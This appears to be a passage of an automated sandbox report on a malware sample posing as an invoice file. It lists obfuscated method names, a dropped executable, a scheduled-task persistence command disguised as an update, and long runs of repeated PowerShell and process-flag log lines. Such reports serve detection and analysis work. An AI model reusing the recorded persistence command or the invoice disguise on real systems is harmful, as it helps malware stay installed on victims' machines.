                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, qLRTZ12GJnmImXqtRt.csHigh entropy of concatenated method names: 'gGNqqDmb5', 'Cu4rRM8Yk', 'aQNXZCrpD', 'zShpeKohQ', 'vNgYoLuqT', 'rq1GLXrfM', 'NkNiFAo1j03I4l2Hqt', 'OUxwLDv0xEo9vI7S35', 'SK6cwJ0Mx', 'QJBCihhpO'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, zy1XZnLW7YQBNumutP.csHigh entropy of concatenated method names: 'wxBQVktK8I', 'C2bQpCqX80', 'fIxTJ0OXD3', 'sZETyaGlLf', 'k0mTUBOgof', 'TWhTRi4aCh', 'PVpTan5CcX', 'xcMTnl43b7', 'cFNTInxkqM', 'd76TodruR1'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, thBvlWSkjabsB2oLif.csHigh entropy of concatenated method names: 'beUls46f10', 'xKOlTRJ4iv', 'ftTlvmDDie', 'WBfvha3ryP', 'eDOvzHaE1w', 'PYUlO9LtIC', 'SMIlHysCNl', 'yiBl2EZCpI', 'pPulxOFZih', 'VWglZw5oRB'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, XFsF25IxPNfEBmhSd8o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g7MC30g4VA', 'NFMCBCWjmc', 'oNnCiEbGZY', 'kTtC9a6ne7', 'qF0CP9xwAw', 'yfgCkEVOYj', 'gdnCW89DHu'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, xfd7J5uMrysOyK7NTk.csHigh entropy of concatenated method names: 'Gg5csn5vOU', 'NdvcMOGdGD', 'wIPcTZ9vAw', 'Sa9cQgZ6BF', 'exMcvL9XPL', 'F59clikeCE', 'Y4dcDvyhlN', 'tWNcdjyIix', 'lSkce39KRw', 'a5Sc6Lr819'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, rRuIvBqw2lDAV0Lgfa.csHigh entropy of concatenated method names: 'G9UHlpnj35', 'HHEHDGpdJV', 'V2OHeHynYk', 'XnjH6l3OqT', 'WplHE3HTY4', 'Ld8HwbDhxY', 'PvAPtSeJvsMMgFlVtb', 'qy0n47VISNXu0UHG6E', 'je7HHelc7G', 'aBDHxDaWlk'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, eZUFRljWcJZhOkQ3W5.csHigh entropy of concatenated method names: 'uy5aAUrfbD6AS4VmPn4', 'ykP6lgrX7bo9HR9gqTS', 'fo4vceFy0s', 'cDKvuHZAma', 't9UvCUZLID', 'rOid46rBORdQJUjnS7h', 'Y3BdSrrEZ2NbW7WvYAC', 'iuyNJFruwbl5e27AE1M'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, FSSV4QIOZXRnmau7TRE.csHigh entropy of concatenated method names: 'MZSu4sANgj', 'VHduKuKe29', 'mG1uqpuT4M', 'dTBur5CDr0', 'oEQuVq4ljP', 'qm8uXugPXJ', 'nIXup4gCnW', 'rHZumd70KX', 'CO8uYTAOpw', 'TmuuGJ2kJw'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, rGsUy5rWUNpkLEljaY.csHigh entropy of concatenated method names: 'zTduHwiesW', 'TxpuxmFfAK', 'MnVuZsrqYq', 'vSGusLD2CR', 'paxuMrL2xu', 'K0JuQdoqbI', 'gccuvsfIMF', 'vjDcWkw4Wg', 'UKFc8DFkdj', 'pSmcSms6j4'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, Fe6Q71Wm6WhO9Yp10w.csHigh entropy of concatenated method names: 'zenM3C7DZm', 'JHCMBWjbKO', 'SI3Mij3Mlg', 'yr8M9OwsqB', 'nVlMPaDK9J', 'QffMkNPX2G', 'u9AMWA71PB', 'Qn3M8cR107', 'GCdMSEVZix', 'Dk4MhRjTCD'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, m0qy82dasqNwHe64S4.csHigh entropy of concatenated method names: 'DD7l4ASIr1', 'DoylKnkDZI', 'NQhlqqO6iQ', 'ye5lrAm3Ja', 'WrdlVKKKTs', 'YJvlX0fJy6', 'o85lpq2QI8', 'RnZlmll86F', 'eUhlYcnCDY', 'ivtlG4CMZ1'
                        Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, QlYnWW9i1E3P9XLykS.csHigh entropy of concatenated method names: 'ToString', 'eNLw591lQM', 'CPgw7OOxO6', 'J8NwJWC9Kq', 'Rpqwy3Jkjj', 'EKxwUgDp3w', 'NO4wRu7yST', 'ImfwaiyARs', 'iuQwn31Dv1', 'I4RwIGbQnt'
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile created: C:\Users\user\AppData\Roaming\pUAQmWA.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
